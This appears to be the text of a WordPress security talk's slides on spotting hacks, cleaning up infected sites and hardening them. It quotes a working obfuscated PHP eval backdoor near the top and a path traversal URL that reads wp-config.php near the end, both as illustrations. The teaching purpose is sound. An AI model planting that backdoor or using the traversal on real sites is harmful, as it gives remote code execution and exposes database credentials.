YOUR SITE IS AND IS NOT

HACKED @ASKWPGIRL #WCSLC

SCHRODINGER’S WEBSITE

You must assume your site is both hacked and not hacked until you open the box and find out.

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>

WordPress Instructor and Custom Theme Developer

Using WordPress Since 2007 — Version 2.2

Not a security expert, but I play one on WordPress.tv

Angela Bowman

Ask WP Girl @askwpgirl

WHAAA?

1

WHY DO HACKERS HACK?Deface sites for fun

Add spammy links to bad web neighborhoods (SEO spam)

Hijack site to add spam, porn, gambling, pay-day loans content

Steal sensitive information to sell

Distribute malware to personal computers

Use server resources for distributed attacks

WHAT DO HACKERS ACTUALLY DO?

Create admin account

Reset passwords

Inject malicious code into content

Add malicious code to existing files or new files

Redirect your website

http://www.wpmayor.com/wordpress-security-based-facts-statistics/

Gravity Forms hack

WHY SHOULD YOU CARE?

Performance issues

SEO tanks

Blacklisting or Phish Tank

Account closed

Angry customers

TYPICALLY, ONLY THE MOST SEVERELY HACKED

SITES WILL BE BLACKLISTED OR

SUSPENDED BY HOST Many hacks are hidden

WHY ARE WORDPRESS SITES VULNERABLE?

29%

8%

22%

41%41% Hosting

22% Plugins

29% Themes

8% Weak Passwords

RECENT VULNERABILITIES

Google Analytics WordPress 4.2.1

Backup to Dropbox FancyBox

TwentyFifteen

Revolution SliderGravity Forms

JetPack

Database of all vulnerable plugins and themes: https://wpvulndb.com/

LOW HANGING FRUIT

Vulnerabilities immediately published on the web

Hackers write bots to exploit vulnerabilities

Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting

COMMON EXPLOITS AND

HOW TO FIX

2

“SPOT THE HACK” GAME

A - Scan Site

B - Look at files on server

C - Find the hacked code

A B

C

1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.

IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE

SITE CODE AND IT'S IMPOSSIBLE TO DETECT

THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI

2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.

3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.

https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html

4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone

Hacked .htaccess file

DIY HACK RECOVERYVia SFTP (preferred) or FTP

1 Backup:

Download everything. Good to

examine later for details of hack if

needed.

2 Delete all except:

cgi-bin.htaccess

wp-config.php(examine these)

3 Upload fresh:

WordPressThemesPlugins

cleaned uploads

Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?

Check raw access logs via cPanel

db12.php, css.php, dirs35.php????

MONITORING TIPS

Audit Activity on Site

https://wordpress.org/plugins/wp-simple-firewall/

Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/

Run https://wordpress.org/plugins/gotmls/ to check wp-content folder

Look for modified dates, unusual names, file types that don’t belong

Compare file list to original download

Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php

Any file can be hacked!

Finding PHP Back Doors

Hmmmm? PHP in a CSS folder?

Finding and Removing Malicious Redirects

Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time.

Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify

Scan with Sucuri’s SiteCheck

Check all the .htaccess files on the server and remove the redirect.

https://sitecheck.sucuri.net/

Use Google Search Console!

Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site.Links to Your Site – you can find suspicious incoming links here.Internal Links – this report can help reveal rogue sections of your site.

http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/

Check for rogue users and posts

Your new admin friends?

Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/

IMMEDIATELY CHANGE PASSWORDS

Use Sucuri plugin to Generate New Security Keys

Reset all passwords, including WordPress users, FTP, web hosting, control panel

Scan computer for viruses!

See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination

CLEAN UP “BAD” HACK If hackers got admin access to site or database,

you might have to nuke the entire site from orbit — it’s the only way to be sure

https://www.youtube.com/watch?v=aCbfMkh940Q

Or contact sucuri.net for

site clean up and monitoring

REQUEST SITE REVIEWIf Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are

certain you’ve cleaned up all hacked files:

https://support.google.com/webmasters/answer/168328?hl=en

SECURITY BASICS

3

UPDATE UPDATE UPDATE

Timely updates are critical for security. Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP

http://askwpgirl.com/updating-wordpress-plugins-themes-core/

SECURE YOUR LOGINOnline Generator:

http://www.pctools.com/guides/password/

Track Passwords: http://agilebits.com/products/1Password

Enable Two-Factor Authentication:http://askwpgirl.com/wordpress-two-factor-

authentication-plugins/

Avoid logging in on public WiFi Networks

RUN A TIGHT SHIP!Delete ALL unused stuff on server

Only use popular and well-maintained themes and plugins

Don’t allow users to register (Settings > General)

Always hold comments for moderation and use spam filtering (Akismet plugin)

GOOD HOSTING

Correct File Permissions

WordPress Auto Updates

Firewall and Scanning

Regular Backups

Server Security

Performance Optimization

Managed WordPress Hosts:Site GroundWP Engine

Get FlywheelWeb Synthesis

Pantheon

EFFECTIVE SECURITY PLUGIN FEATURES

Limit login access

Block bad URL requests with a Firewall

Audit activity

Security through obscurity is not security

IP addresses don’t matter and should not be used as the foundation of a WordPress security policy

My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/Does all the above and more. Will notify you of vulnerable plugins.

mywebsite.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php

BACKUPSCommon wisdom is to backup your site

Backups are to your site what major medical health care coverage is to your health

Usually only helpful in case of a disaster

Services:VaultPress and

WorpDrive good hosted solutions!

Plugins:BackupBuddy (paid),

BackWPUp,Duplicator

SECURE YOUR COMPUTERScan for viruses and trojans

Be careful about downloading stuff!!!!

RESOURCEShttp://snipe.net/2010/01/when-wordpress-gets-hacked/

https://support.google.com/webmasters/answer/163633?rd=1 ***

http://aw-snap.info/articles/find-backdoor.php

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks

http://aswkpgirl.com/nuke-it-from-orbit

https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/

https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/

About the banking hack: https://www.proofpoint.com/es/node/327

Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc

http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/

CONTACTfacebook.com/askwpgirl

twitter.com/askwpgirl

http://askwpgirl.com

http://boulderdigitalarts.com

One-on-One consulting third Friday of every month at Boulder Digital Arts

Six-week theme customization course in Colorado and online.

SEO and Best Maintenance Tips Newsletter http://askwpgirl.com